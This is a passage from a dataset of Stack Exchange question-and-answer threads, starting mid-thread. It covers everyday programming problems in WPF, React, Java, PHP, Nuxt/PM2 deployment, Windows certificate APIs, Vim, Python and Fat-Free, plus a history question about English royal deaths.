maxWidth || textSize == defaultTaille)\n {\n break;\n }\n textSize++;\n }\n else\n {\n if ((Math.Round(newFormat.Width) - delta) <= maxWidth && textSize <= defaultTaille)\n {\n break;\n }\n textSize--;\n }\n }\n\n textBlock.Taille = textSize;\n}\n<\/code>\nThe role of the handler is to resize the control based on the length of the content. It is quite ugly but I want to have the functional part working before refactoring.\nComment: are you doing anything special in the TargetUpdated event handler ?\nComment: I don't know if it's just a typo but you are missing a comma in the binding. It should look like this: {Binding Path=Total, Converter={StaticResource CurrencyToStringConverter}, NotifyOnTargetUpdated=True}\nComment: It is a typo, I added line breaks in the question for readability, there is a coma between the Converter and the NotifyOnTargetUpdated parts in the real source code. Editing the question to fix this.\nComment: I added the code of the handler in the question. While it is overcomplicated, I don't think it does anything that might break the binding.\nAnswer: If you're getting a XamlParseException that means this error is happening during the initialization of this control. \nWith <code>NotifyOnTargetUpdated=True<\/code> specified, the TargetUpdated event is being raised inside your InitializeComponent call. At this point, it's incredibly doubtful you have a DataContext, so the binding will evaluate to null. Normally, there's no problem, but you are requesting an event be raised when the property is updated.\nSo it's hitting your event handler with a null <code>textBlock.Contenu<\/code> value, you're passing it into the first parameter of FormattedText (which is named <code>textToFormat<\/code>) and it is throwing an ArgumentNullException.\nPractice some defensive programming and check your <code>textBlock.Contenu<\/code> value for null before running your code.\nTwo tips for future reference:\n1) When receiving an exception, paste the entire stack trace, including InnerException (so call Exception.ToString). More often than not, you will see where it's happening. If not, someone on here will see where it's happening much quicker than you got your answer.\n2) When receiving an exception, and you don't know where it's being thrown from (and you clearly don't, or you'd have seen it's in your code), force Visual Studio to break on all exceptions.\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/d14azbfh(VS.80).aspx\n(Note that depending on your settings, the menu item they reference may or may not be there. You can also use CTRL+ALT+E to open the Exceptions dialog.)\nWith this set, the debugger will stop on the exact line of code throwing the Exception. \nComment: Thank you, that was exactly the problem. I wasn't expecting at all to be called during the Initialization of the control.\n","meta":{"source":"stackoverflow","title":"WPF Converter and NotifyOnTargetUpdated exclusive in a binding?","dup_signals":{}},"subset":"stackexchange"} +{"text":"TypeError: .some Is not A Function React JS Error\n\nQuestion: <code>const [userFavorites, setUserFavorites]= useState([]);<\/code> This is the part of my code that sets the state of userFavorites to an array and I have a function somewhere else that tries to do <code>userFavorites.some<\/code> and I keep <code>TypeError: userFavorites.some is not a function<\/code>. I appreciate any help!\nComment: if you console.log userFavorites what does it return. It seems that it might not be an array\nComment: Please show more of your code. ANything that can change userFavorites especially\nAnswer: If you can post the entire code snippet then it will be helpful to answer. Though you're possibly doing something like this.\nInitially, it is declared as an empty array <code>[]<\/code>, But there is a possibility that somewhere in your code you're setting the state like this.\n<code> setUserFavorites(someDataFromAPICallORPostOperation).\n<\/code>\nHere, Your <code>someDataFromAPICallORPostOperation<\/code> is possibly undefined.\nYou can solve this in two ways.\n1. Default to an empty array while setting the state.\n<code> setUserFavorites(someDataFromAPICallORPostOperation ?? []).\n<\/code>\n2. Check for the <code>undefined<\/code> before calling the <code>.some<\/code> function.\n<code>userFavorites?.some(function) \/\/ Using optional chaining\n<\/code>\nor\n<code>userFavorites && userFavorites.some(function)\n<\/code>\nEDIT - Based on the code mentioned in the commented link.\nThe array push operation doesn't return the updated array, Instead, it returns the number of elements in the updated array.\nThis can be solved as\n<code> function addFavoritesHandler(favoriteMeetup) {\n setUserFavorites(prevUserFavorites => {\n return [...prevUserFavorites, favoriteMeetup];\n });\n }\n<\/code>\nExplanation, Earlier you were doing something like this.\n<code> function addFavoritesHandler(favoriteMeetup) {\n setUserFavorites(prevUserFavorites => {\n return prevUserFavorites.push(favoriteMeetup);\n });\n }\n<\/code>\nHere you will set the state to a number instead of an array as <code>push<\/code> will return the number of elements in that array. Hence, while doing <code>userFavorites.some<\/code> it throws an error as you are setting the <code>userFavorites<\/code> to a number instead of an array.\nComment: https:\/\/pastebin.com\/rLHT3i9V That is the code for the js file creating the userFavorites and the js file using the other js file.\nComment: @Airlo I have updated the answer. See the `Edit` part at the end of this answer.\n","meta":{"source":"stackoverflow","title":"TypeError: .some Is not A Function React JS Error","dup_signals":{}},"subset":"stackexchange"} +{"text":"What English king died from water intoxication?\n\nQuestion: I vaguely remember reading a story about an English king that died from drinking too much water after a hunt. I'm sorry to say that all parts of this story may be untrue\u2026I'm not sure whether it was a king or other royalty, whether it was England or somewhere else, or whether it was actually after returning from a hunt or some other event. I also don't remember the source of the story.\nDespite all the uncertainty: does someone recognise this story? Did it actually happen, or is it a historical urban myth?\nAnswer: Henry I, the 3rd norman King of England, died after eating a surfeit of lampreys after going on a hunting trip while ill. Apparently eating them was against the advice of his physician. Lampreys were pretty common fare in Early Medieval Britain but are pretty gross eel-like fish that still happily inhabit English rivers today. It is likely that they weren't properly cooked, and may have been contaminated with water from the river they were fished from. England rivers were littered with weirs and eel traps, and there were several Doomes demanding Weir clearance around the country in the 10th and 11th centuries (Law of Aethelred II) as they blocked the flow of the river, but rivers remained pretty clogged anyway and likely didn't dilute\/run off the sewage and waste all that well! \nJohn I 'Lackland' probably died of dysentery brought on by eating rotten peaches and drinking wine during a military campaign.\nEdward IV died after catching a chill after a fishing trip. Some have hypothesized that he died of a stroke.\nAll of this information is on Wiki. Use this as a starting point to find better sources. I would wager, Henry I best matches your question.\nComment: +1 just for introducing me to the word `weir`. We call the non-fishing variety a \"low water dam\" here in The States. I wonder why we abandoned\/lost the original word...\nComment: @T.E.D.: FWIW, in German it's \"Wehr\", with the verb \"wehren\" having the meanings \"to defend, to resist, to dam\". (Yes, that's where \"Wehrmacht\" came from, literally \"defense force\".) Funny thing how the English word only has that one meaning...\nComment: probably just trying to spell it :p I went through wear, weer, wehr, wier to get to my document...\nComment: \"*weirs*\" are \"*weird*\" is one way to remember the spelling.\nComment: @DevSolar - I will admit to having seen the word before, in Anne McCafferey [Pern novels](https:\/\/en.wikipedia.org\/wiki\/Pern), but I originally thought she just made the word up. After this answer, it made a bit more sense, but I was thinking it was a bit weird to compare Dragon homes to fish hatcheries (although they did hatch dragon eggs in them). Your comment makes her usage of that word make much more sense, if that's what she meant by it.\nComment: Thanks. I found the Wiki earlier,and also thought the Henry I was the best match.\nAnswer: King Louis X of France died young in 1316 after a tennis match, I think. Possibly drinking something was connected with it.\nKing Edward VI of England died as a boy after a long and painful illness. It doesn't make medical sense today but I think I remember someone at the time blaming it on drinking water that was too cold.\nI suggest that you might try researching the deaths of Louis X and Edward VI for anything about drinking water being the cause.\nComment: Sources would improve this answer.\nAnswer: Perhaps you are thinking of William the Conqueror. \nThe account of William's death from William of Malmesbury in his 12th century Gesta Regum Anglorum reads as follows in translation:\n\nAt last he set fire to the city of Mantes, where the church of St.\n Mary was burnt, together with a recluse who did not think it\n justifiable to quit her cell even under such an emergency; and the\n whole property of the citizens was destroyed. Exhilarated by this\n success, while furiously commanding his people to add fuel to the\n conflagration, he approached too near the flames, and contracted a\n disorder from the violence of the fire and the intenseness of the\n autumnal heat. Some say, that his horse leaping over a dangerous\n ditch, ruptured his rider, where his belly projected over the front of\n the saddle. Injured by this accident, he sounded a retreat, and\n returning to Rouen, as the malady increased he took to his bed. His\n physicians, when consulted, affirmed, from an inspection of his\n urine, that death was inevitable.\n","meta":{"source":"history.stackexchange","title":"What English king died from water intoxication?","dup_signals":{}},"subset":"stackexchange"} +{"text":"JAVA class array\n\nQuestion: I am trying to write to code to list all the objects in the class. (Which is working) but I want to get the code to check if there are objects if the player is empty and print out a message to screen if it is. But I cant get it to work. Can anyone assist me please ? \nClass\n<code> public void listAll() \n {\n for (Song a : songs) {\n if(songs.isEmpty()) \/\/cant get this to check if there are songs on the player.\n {\n System.out.print(\"There are no songs on the playlist\");\n }\n else{\n System.out.print(a);\n }\n }\n }\n<\/code>\nTester \n<code> keyIn.nextLine(); \/\/clear the buffer of the previous option\n System.out.print(\"On player are\");\n player.listAll();\n break;\n<\/code>\nComment: No need to check that condition as you are using `enhanced for loop`. Loop willl automatically terminate when the next element in array is null.\nComment: did you try debugging it ?\nComment: Did you manage to get it working?\nComment: Yes I did thank you very much\nAnswer: You are trying to loop through an empty list, so the looped code doesn't happen at all. If you check whether the list is empty outside of the loop, then you get the result you wanted.\n<code>public void listAll() {\n if (songs.isEmpty()) \/\/ cant get this to check if there are songs on the\n {\n System.out.print(\"There are no songs on the playlist\");\n } else {\n for (Song a : songs) {\n System.out.print(a);\n }\n }\n\n}\n<\/code>\nAnswer: If <code>songs<\/code> is empty, the loop won't be entered. You need to check outside the loop :\n<code>public void listAll() {\n if(songs.isEmpty()) {\n System.out.println(\"There are no songs on the playlist\");\n } else {\n for (Song a : songs) {\n System.out.println(a);\n }\n }\n}\n<\/code>\nAnswer: You need to check the condition <code>if(songs.isEmpty())<\/code> outside the <code>for<\/code> loop because if the <code>list<\/code> is <code>empty<\/code>, the execution does not go inside the <code>for loop<\/code>, so your <code>if<\/code> condition statement will not get executed at all.\n<code>public void listAll() \n {\n \/\/Check this first\n if(songs.isEmpty())\n {\n System.out.print(\"There are no songs on the playlist\");\n return;\/\/It is even more better to return from here itself\n }\n\n \/\/NOW, use for loop\n \/\/if songs size is zero, execution does not go inside the for loop\n for (Song a : songs) {\n System.out.print(a);\n }\n }\n<\/code>\nIt is even better, if you can use the <code>return<\/code> statement to go back to the caller (immediately) from the method (like above), which will indicate that there is no need to process the subsequent lines of code in the method.\nComment: Thank you very much that worked a treat and now can do it for some of the other parts I need :-)\n","meta":{"source":"stackoverflow","title":"JAVA class array","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the best practice of using if condition in JavaScript?\n\nQuestion: \n\n<code>var foo = \"bar\";\nif (foo) {\n console.log(foo);\n}\n\nvar foo = \"bar\";\nif (!!foo) {\n console.log(foo);\n}<\/code>\n\nWhich one should I use? \nPerformance wise both ways look same. \nhttps:\/\/jsperf.com\/ifconditioncheck\nAnswer: The first. The second one doesn't read well and I can't see an obvious use for it.\nComment: Unless micro-optimizations are a must, readable code is the way to go\nAnswer: \n<code>!!<\/code> is not not\n\nInside the if() both are valid, 2nd one just force it to become a bool value but really not needed. So just go with <code>if (foo)<\/code>\nbut if you want to do assign another variable there is a difference. See example below:\n\n<code>var foo = \"bar\";\n\nvar myvar = foo;\nvar myvar2 = !!foo;\n\nconsole.log(\"myvar-->\" + myvar);\nconsole.log(\"myvar2-->\" + myvar2);<\/code>\n\nRead more about JS truthy-falsey: https:\/\/j11y.io\/javascript\/truthy-falsey\/\nAnswer: You add a condition in the second block with !!foo, it would require more time.\nBasically, if you run thousands of time with boucle the same if, you will see that the first one has the best performance\nexample:\n<code>var foo = \"bar\"; \nvar n = new Date().getMilliseconds();\nfor (i=0;i<5;i++){\n if (foo) {console.log(foo);}\n}\nvar n2 = new Date().getMilliseconds();\nvar elasped_time = n2-n;\nconsole.log(elasped_time);\n<\/code>\nAnswer: If you just want to check the availability of a value in string foo use \n<code>var foo = \"bar\";\nif (foo) {\n\n}\n<\/code>\nBut this is not the best way to check for a empty string .\n","meta":{"source":"stackoverflow","title":"What is the best practice of using if condition in JavaScript?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I make an array of all lists length x of the numbers 0 and 1?\n\nQuestion: I need to create an array like this: \n<code>$array = array(array(1,1,1,0,0,0,1,1), array(1,1,1,1,0,0,1,0));\n<\/code>\nbut with all combinations of 1 and 0.\nI wish to do this automatically, so I was thinking a for loop would be the best idea. \nIn other words the inner arrays should be all combos like 0,0,0,0,0,0,0,0 then 0,0,0,0,0,0,0,1 then 0,0,0,0,0,0,1,0 then 0,0,0,0,0,0,1,1. for all combos.\nI started like this:\n<code>$array = array();\nfor($i =0;$i<100; $i++){\n$array[$i] = 0;\n}\n<\/code>\nHow do I get this to do what I am trying to do?\nComment: It looks exactly like a list of binary numbers... did you notice that?\nComment: yess i actually did, but not sure how to get all binary numbers\nAnswer: Use <code>decbin<\/code> to convert your counter to binary.\n<code>str_pad<\/code> allows you to pad strings, in this case I'm 0-padding it to a length of 8 bits.\n<code>$array = array();\nfor($i =0;$i<100; $i++){\n $array[$i] = str_pad(decbin($i), 8, \"0\", STR_PAD_LEFT);;\n}\nvar_dump($array);\n<\/code>\nDemo\nAnswer: This will print out an array of all binary variations from <code>00000000<\/code> to <code>11111111<\/code> where each one is in it's own array of chars.\n<code>$array = array();\n\nfor ($i = 0; $i < 256;)\n{\n $array[] = str_split(sprintf('%08d', decbin($i++)));\n}\nprint_r($array);\n<\/code>\nSee example\nComment: +1 for this one - I think an \"array of arrays\" is what the OP asked for. Really like the compact use of `decbin`, `sprintf(\"%08d\"`, and `str_split` - masterful!\n","meta":{"source":"stackoverflow","title":"How can I make an array of all lists length x of the numbers 0 and 1?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Running multiple apps with PM2 from same repo\n\nQuestion: Some context:\n\nI have a single repo (nuxt application) that is used to deploy to multiple apps\/domains\nall apps are on the same server\neach app is in a separate folder with a clone of the repo, each folder is served on it's own domain (nginx)\neach app has a different env file, the most important difference is a domain id (eg: <code>DOMAIN_ID=1<\/code> etc..)\nbefore build, I have a node script that does some setup work based on this <code>DOMAIN_ID<\/code>\n\nI would like to use PM2 to:\n\nuse a single dir with the repo for all my domains\nupon running pm2 deploy production I would like to be able to deploy all the domains, each domain should run it's setup script before doing the build\neach domain should build in a subfolder so I can configure nginx to serve the app for a specific domain from it's folder\n\nI tried to create an ecosystem file like so:\n<code>module.exports = {\n apps: [\n {\n name: 'Demo1',\n exec_mode: 'cluster',\n instances: 'max',\n script: '.\/node_modules\/nuxt\/bin\/nuxt.js',\n args: 'start',\n env: {\n DOMAIN_ID: 1,\n },\n },\n {\n name: 'Demo2',\n exec_mode: 'cluster',\n instances: 'max',\n script: '.\/node_modules\/nuxt\/bin\/nuxt.js',\n args: 'start',\n env: {\n DOMAIN_ID: 2,\n },\n },\n ],\n deploy: {\n production: {\n host: 'localhost',\n user: 'root',\n ref: 'origin\/master',\n repo: 'my_repo',\n path: 'path_to_repo',\n 'post-setup': 'npm install && node setup.js',\n 'post-deploy': 'npm run build:setup && pm2 startOrRestart ecosystem.config.js --env production',\n },\n },\n}\n<\/code>\nbut it doesn't seem to work.\nWith the above ecosystem file the processes are created but when I access the domain for Demo1, pm2 serves randomly from Demo1 or Demo2 process.\nThere should be 2 dist folders somewhere, one for each of the apps.\nI'm wondering if the above config is good and I'm just having an nginx issue or pm2 can't actually handle my use case.\nComment: Are these apps static or SSR?\nComment: Hi Nick. The apps are SSR.\nComment: Hey Catalin, I have prepared an answer but I'm not sure it solves your issue as you haven't really stated exactly what it is that isn't working. Can you update your question with just a little more detail? What you're aiming to achieve is pretty clear, but then you simply state \"but it doesn't seem to work\".\nComment: Thanks Nick. I tried to put more relevant info in the question. Sorry but I don't know nginx (somebody else is working on that part). Not sure if what I'm trying to achieve can be done with pm2.\nComment: I posted an answer, which should help point you in the right direction. If you need help bending things to your exact use case, just leave a comment and I'll see if I can help. Other might be able to help where I can't.\nAnswer: To achieve what you're after, you'll need the following for each app:\n\nA directory to serve your production build files from.\nA node server instance, running on a unique port (eg. 3000, 3001).\nA suitable nginx virtual host configuration for each app.\n\nFirst, the build directories. The <code>nuxt build<\/code> script will look for a <code>.nuxt.config.js<\/code> and <code>.env<\/code> file in the srcDir (project root by default), produce the production build files for your app based on these files, and store the output at <code>\/.nuxt<\/code> (again, by default). Passing the <code>--config-file<\/code> and <code>--dotenv<\/code> arguments to the <code>nuxt build<\/code> command allows you to point to different config and env files, thus enabling you to produce separate builds from a single repo.\nEg:\n<code>-- appRoot (the default srcDir, we'll change this in nuxt.config.js)\n |__ node_modules\n |__ package.json\n |__ ...etc\n |__ src\n |__ commons\n | |__ (shared configs, plugins, components, etc)\n |__ app1\n | |__ nuxt.config.js\n | |__ ecosystem.config.js\n | |__ .env\n |__ app2\n |__ nuxt.config.js\n |__ ecosystem.config.js\n |__ .env\n<\/code>\nFor convenience, you could create the following scripts in <code>package.json<\/code>. To produce a build for app1, you run <code>npm run app1:build<\/code>.\n<code>\"scripts\": {\n ...\n \"app1:build\": \"nuxt build --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env\",\n \"app2:build\": \"nuxt build --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env\",\n ...\n}\n<\/code>\nNow we're pointing our build scripts to individual app's <code>nuxt.config.js<\/code> files, we need to update those files and specify a srcDir and buildDir. The <code>buildDir<\/code> is where the output from each build command will be stored.\n<code>nuxt.config.js\n...\n srcDir: __dirname,\n buildDir: '.nuxt\/app1' (this path is relative to the project root)\n...\n<\/code>\nThat's it for building. For serving...\nEach app needs a unique production server instance, running on it's own unique port. By default, <code>nuxt start<\/code> will launch a server listening on port 3000 and based on the <code>nuxt.config.js<\/code> file at the root of the project. As with the build command, we can pass arguments to change the default behaviour.\nYou could add the commands to package.json:\n<code>\"scripts\": {\n ...\n \"app1:build\": \"nuxt build --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env\",\n \"app1:start\": \"nuxt start --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env -p=3000\",\n \"app2:build\": \"nuxt build --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env\",\n \"app2:start\": \"nuxt start --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env -p=3001\",\n ...\n}\n<\/code>\nBy telling <code>nuxt start<\/code> to use app specific <code>nuxt.config.js<\/code>s, and having those point to unique <code>buildDir<\/code>s, we're telling our servers which directories to serve from for each app.\nImportant\nMake sure when starting a production server you specify unique port numbers. Either add it to the start command (as above) or inside the <code>nuxt.config.js<\/code> file of each app.\nNow you have unique builds, and unique server instances, you need to configure nginx to serve the correct app for each domain (I'm assuming you either know how to configure nginx to support virtual hosts, or someone on your team is handling it for you). Here's a stripped down config example:\n<code>server {\n ...\n server_name app1.com;\n root \/path\/to\/appRoot;\n ...\n location \/ {\n ...\n proxy_pass http:\/\/localhost:3000;\n ...\n }\n ...\n}\n<\/code>\nEach app's nginx config can point to the same root- it's the proxy_pass that routes the request to the correct node server, which in turn knows which app to serve as we passed the appropriate arguments in with our <code>nuxt start<\/code> command.\nPM2\nI use PM2 to manage the node server instances, so a deployment script for the given example might look like:\nHandle your version control\/env files, and then...\n<code>cd \/appRoot\nnpm install\nnpm run app1:build\npm2 reload src\/app1\/ecosystem.config.js\n<\/code>\nWith app1's <code>ecosystem.config.js<\/code> files setup as so:\n<code>module.exports = {\n apps: [\n {\n name: \"app1\",\n exec_mode: \"cluster\",\n instances: \"max\",\n script: \".\/node_modules\/nuxt\/bin\/nuxt.js\",\n args: \"start --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env -p=3000\"\n }\n ]\n}\n<\/code>\nMight need some tweaking to suit your needs, but I hope this helps!\n","meta":{"source":"stackoverflow","title":"Running multiple apps with PM2 from same repo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding CRL distribution point URL from certificate using visual c++\n\nQuestion: I have to find CRL distribution point URL from a certificate. I managed to get obtain context (CERT_CONTEXT) of a certificate. \nFrom this, how do I find CRL URL? To obtain publickeylength, there was a function CertGetPublicKeyLength. Similary is there anyway to find CRL Distribution point?\nAnswer: Yes, I found the answer! You can use CryptGetObjectUrl() to obtain it.I would like to post the snippet of the code as it will be surely of some help to someone.\n<code>DWORD pcbUrlArray,pcbUrlInfo;\nif(CryptGetObjectUrl(URL_OID_CERTIFICATE_CRL_DIST_POINT,pCert,CRYPT_GET_URL_FROM_PROPERTY | CRYPT_GET_URL_FROM_EXTENSION,NULL,&pcbUrlArray,NULL,&pcbUrlInfo,0))\n{\n PCRYPT_URL_ARRAY urlArray = (PCRYPT_URL_ARRAY)malloc(pcbUrlArray * sizeof(CRYPT_URL_ARRAY));\n PCRYPT_URL_INFO urlInfo = (PCRYPT_URL_INFO)malloc(pcbUrlInfo * sizeof(CRYPT_URL_INFO));\n\n if(CryptGetObjectUrl(URL_OID_CERTIFICATE_CRL_DIST_POINT,pCert,CRYPT_GET_URL_FROM_PROPERTY | CRYPT_GET_URL_FROM_EXTENSION,urlArray,&pcbUrlArray,urlInfo,&pcbUrlInfo,0))\n {\n for(int i=0;i<urlArray->cUrl;i++)\n wcout<<urlArray->rgwszUrl[i]<<endl;\n }\n}\n<\/code>\nBasically you get the pCert (CERT_CONTEXT) through\n<code>WinHttpQueryOption( hRequest,WINHTTP_OPTION_SERVER_CERT_CONTEXT,&pCert,&dwLen);\n<\/code>\nComment: Thank you for the code snippet but I think you have a bug there: CryptGetObjectUrl returns size in bytes, not in objects so malloc allocates way too much memory\n","meta":{"source":"stackoverflow","title":"Finding CRL distribution point URL from certificate using visual c++","dup_signals":{}},"subset":"stackexchange"} +{"text":"HTML text-field value with 'special characters'\n\nQuestion: Probably this is a known problem and there is a specific best practice.\nI have to fill a text field value with received text from backend.\nI this text contains some 'special characters' (for example \" <) I have some issued during the rendering of the page.\nHow can I solve this?\nCan I solve this issue front-end side?\nI can use only javascript front-end side. I not use PHP;\nI use this html code:\n<code><input class=\"myclass\" value=\"<%= text_from-backend %>\" placeholder=\"My Placeholder\"\/>\n<\/code>\nComment: This is impossible to answer unless you specify what the \"some issues\" are that you have and what templating system that is. A [mcve] please.\nComment: probably what you are looking for are html entities like `>` which, if you put it into your html, will be rendered as `>`, but the question is not specific indeed\nAnswer: You can replace special characters in PHP:\n<code><input class=\"myclass\" value=\"preg_replace('\/[^ a-z\\d]\/ui','','<%= text_from-backend %>');\" placeholder=\"My Placeholder\"\/>\n<\/code>\n","meta":{"source":"stackoverflow","title":"HTML text-field value with 'special characters'","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vim Formatprg PAR to justify comments with Date Stamp\n\nQuestion: I am using PAR paragraph reformatter. It is an incredible tool to be used with Vim. I am having a situation where, I have a comment that has date, developer initials and the comment message. I want to align (justified) it using Par, so that it maintains the indentation for date and initials. Is that possible?\nHere is what I have:\n\nHere is what it does when I try:\n\nset formatprg=par\\ r80j\n\nDesired result:\n\nThank you. \nComment: Please, don't use screen shots when you can copy and paste the text. Also, would avoid us having to re-type to play with it.\nComment: Sorry. It makes sense...I will add as a text from now on so that its easy to try it out.\nComment: No problem. Use the code mode or check the editing faq. Thanks! Best wishes\nAnswer: I don't recommend setting this as the standard formatting program\noptions, unless this is your standard way of writing any text. So here\nis a filter version, better for single uses:\n<code>:%!par 80p25dhj\n<\/code>\nI'm assuming you want a 80 final width and justified text. Remove <code>j<\/code> or\nchange <code>80<\/code> if needed. Also, the width of the prefix is a guess. Please\ncheck it:\n<code>; 2012\/12\/12 AB Lorem ipsum ....\n^ ^\n|-------------------| This width in the original text\n<\/code>\nI guessed 25 but use a correct number.\nComment: @SatoKatsura lol Yes, and it really needs the rewrite. Interesting that this program was first written in the year I was born, and since then not to have a proper documentation is thus a life-time wait :-D Anyway, I think it even says this, but the manual is really a explanation of how it works, not its usage. I didn't understand many parts until I opened the code and then \"ah, this is what he means\". The good part is that we can see how a brilliant programmer mind works. The bad part is we may not understand _it at all_ if we don't spend the time to understand _it all_, the whole process.\nComment: **OMG**....This is incredible...This is exactly what I wanted..It works like a charm.... Thank you so much....sidyll\nComment: @Cricrazy Happy that it worked! :-D This utility par is very powerful and complex, so is the manual. I recommend exploring it when you have the time, it is useful in the long run. Also, if the question solves your problem, please mark it as accepted answer to help future viewers here to know. Thanks!\nComment: I'm using par on daily basis. I've been planning to understand WTF all those concepts in par's manual _actually_ mean for maybe 10 years now -- and I'm a mathematician. But you know what, the author has been putting off rewriting of said manual for even longer. Yay for learning by doing -- saves you from _understanding_ what you're doing. :)\n","meta":{"source":"stackoverflow","title":"Vim Formatprg PAR to justify comments with Date Stamp","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generate unique 16 digit alphanumeric based on input number in python\n\nQuestion: How would I generate unique 16 digit alphanumeric based on input number in python. Result should be the same if we run the function multiple times.\nfor example if the input is 100 and the program returns 12345678abcdefgh and next time if the user provides same input it should return the same result 12345678abcdefgh.\nComment: How \"unique\" do you want? Even an md5 hash will give you twice that number of characters. I suppose you could take a slice of that though to get length 16\nAnswer: <code>\"\"\"\ngenerate unique 16 digit alphanumeric based on input number in python. Result\nshould be the same if we run the function multiple times. for example if\nthe input is 100 and the program returns 12345678abcdefgh and next time if the\nuser provides same input it should return the same result 12345678abcdefgh.\n\"\"\"\n# Note: This does not use hashlib because hash returns HEX values which \n# are 16 alphanumeric characters: \n# 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f\n\ndef generate_alphanumeric(number):\n # Convert the number to binary representation\n binary = bin(number)\n # remove 0b from binary representation prefix\n mask_right_side = binary[2:]\n # Create a mask to select 16 characters based on the binary representation.\n # Creating padding 0's for the mask_left_side\n mask_left_side = '0' * (16 - len(mask_right_side)) # Padding characters\n # Create the 16 character mask\n mask = mask_left_side + mask_right_side\n # Create a list of tuples of (zero_code, one_code)\n zeros_codes = '12345678apqdexgh'\n ones_codes = '90ijklmnobcrsfyz'\n codes = list(zip(zeros_codes, ones_codes))\n # Create the alphanumeric output.\n if len(mask) <= 16:\n result = ''\n for index in range(16):\n value = int(mask[index])\n zero_code, one_code = codes[index]\n if value: # mask value is 1\n result += one_code\n else:\n result += zero_code\n return result\n else:\n message = f'The entered values {number:,d} is greater that 65,' \\\n f'535. This is not allowed because the returned 16 ' \\\n f'character alphanumberic text will be a repeat of text ' \\\n f'assigned in the range of 0 to 65,535. This violates the ' \\\n f'requirement for unique text per number.'\n return message\n\n# Testing\nprint(generate_alphanumeric(100))\nprint(generate_alphanumeric(15))\nprint(generate_alphanumeric(0))\nprint(generate_alphanumeric(65_535))\nprint(generate_alphanumeric(65_536))\n<\/code>\nAnswer: You could use the hashlib module to hash the input integer. The generated hash will always be the same if the input is the same.\n<code>import hashlib\n\nprint('Enter a number to hash: ')\n\nto_hash = input()\n \ndigest_32 = hashlib.md5(bytes(int(to_hash))).hexdigest()\n\ndigest_16 = digest_32[0:16]\n\n# output: 6d0bb00954ceb7fbee436bb55a8397a9\nprint(digest_32)\n\n# output: 6d0bb00954ceb7fb\nprint(digest_16)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Generate unique 16 digit alphanumeric based on input number in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"fatfree framework, repopulate fields after unsuccessful validation\n\nQuestion: I have GET route which shows the contact form, and POST route when user submits the form, then in my controller method I do some validation tests on data being submitted.. how would I now send user back to form if data is not valid, with entered data being re-populated in form fields?\nI know I can use <code>isset(@POST.fieldname)<\/code> in my template, but what's the right way of\nsending entered data back to that view, and how to redirect user back to the\nform? Is the <code>f3->reroute<\/code> method right way of doing that?\nAnswer: I think you can take as a rule to include input data inside your form views. This way, any form view will be easily reusable with any source of data.\nFor example:\nYour form view:\n<code><form action=\"\" method=\"post\">\n <input type=\"text\" name=\"email\" value=\"{{ @@input.email }}\"\/>\n <input type=\"text\" name=\"message\" value=\"{{ @@input.message }}\"\/>\n <button type=\"submit\">Submit form<\/button>\n<\/form>\n<\/code>\nYour controller class:\n<code>class myController {\n\n function get($f3) {\n $this->renderForm();\n }\n\n function post($f3) {\n $post=$f3->clean($_POST);\n \/\/validate form data here\n if ($form_validated) {\/\/valid form data\n\n } else \/\/invalid form data\n $this->renderForm($post);\n }\n\n protected function renderForm($input=array()) {\n $tpl=Template::instance();\n \/\/variant 1:\n echo $tpl->render('form.html','text\/html',array('input'=>$input))\n \/\/ or variant 2:\n Base::instance()->set('input',$input);\n echo $tpl->render('form.html');\n }\n\n}\n<\/code>\nIn some other contexts, you can feed a form view with data coming from a db mapper (for example when editing an entry from a back-office): <code>$this->renderForm($mapper->cast())<\/code>\nComment: Well I didn't address this point in my example because I thought it was a bit off-topic. I guess it's preferrable to inject the filtered posted data into the view rather than the raw data... although there's no big risk not to do so, since the raw data is not saved in DB at that stage. Anyway, I've just updated the example.\nComment: Just reroute to the `GET` controller. If you need to print a success message, you'll need to store it in `SESSION`. You can implement that yourself or use this [Flash message](https:\/\/github.com\/ikkez\/F3-Sugar\/tree\/master-v3\/Flash) utility.\nComment: Sure, you've got the idea :)\nComment: I suppose this is also better for security, having input passed from controller to a view, than using @POST.field in view directly..\nComment: so now after the user has been submitted valid data, how would one display that form again with success message, preventing further resubmission by clicking f5? should i do `$f3->clear('myformdatafields')`in that `if($form_validated)` block, and then do `$this->renderForm()`, or there is no need to clear variable, just call `renderForm()` without `$input`?\nComment: can I use native F3, `f3->set('SESSION.message', 'message');`, then after\nreroute and display message to the user, clear it in `afterroute()`? Would\nthat work?\n","meta":{"source":"stackoverflow","title":"fatfree framework, repopulate fields after unsuccessful validation","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to check if two Facebook id are friends or not Codeigniter\n\nQuestion: Hi I have user registered through facebook in my App and In mysql database I am having facebook unique id.\nHow can i get the list of my facebook friends from mysql database.\nI mean using facebook sdk compare two facebook id and get result if they are friends or not\nAnswer: You get a list of all friends (who authorized your App) with the <code>\/me\/friends<\/code> endpoint. You can also get the friends info for a specific friend like this: <code>\/me\/friends\/123455<\/code> (the number is the friend id).\nIf you need to know if two App users are friends while they are not online, you can do two different things:\n\nStore an Extended User Token for each user, it is valid for 60 days and you can use the API call above to check if two users are friends.\nStore the IDs of friends (= the result of <code>\/me\/friends<\/code>) when the user authorizes your App, and update the info whenever he visits your App again. That way you don\u00b4t even need an API call, but the friends may not be up to date.\nComment: I need to check if two users are friends by passing their facebook id\nComment: i will add some more info to my answer\n","meta":{"source":"stackoverflow","title":"How to check if two Facebook id are friends or not Codeigniter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to schedule jobs in Kubeflow?\n\nQuestion: I'm setting up a Kubeflow cluster on AWS EKS, is there a native way in Kubeflow that allows us to automatically schedule jobs i.e. (Run the workflow every X hours, get data every X 